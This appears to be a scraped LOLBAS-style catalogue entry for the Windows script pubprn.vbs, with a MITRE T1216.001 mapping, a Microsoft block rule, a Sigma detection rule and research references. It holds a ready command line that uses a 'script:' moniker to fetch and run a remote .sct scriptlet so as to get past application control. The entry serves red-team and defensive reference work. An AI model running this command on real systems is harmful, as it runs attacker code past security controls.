Execute Execution Windows Set the 2nd variable with a Script COM moniker to perform Windows Script Host (WSH) Injection Use Proxy execution pubprn.vbs 127.0.0.1 script:{REMOTEURL:.sct} copy Contextuser NativeExecute MITRET1216.001 DetectionBlockRule: docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rulesSigma: github.com/SigmaHQ/sigma/blob/ff5102832031425f6eed011dd3a2e62653008c94/rules/windows/process_creation/proc_creation_win_lolbin_pubprn.yml Refsenigma0x3.net/2017/08/03/wsh-injection-a-case-study/www.slideshare.net/enigma0x3/windows-operating-system-archaeologygithub.com/enigma0x3/windows-operating-system-archaeologylolbas-project.github.io/lolbas/Scripts/Pubprn/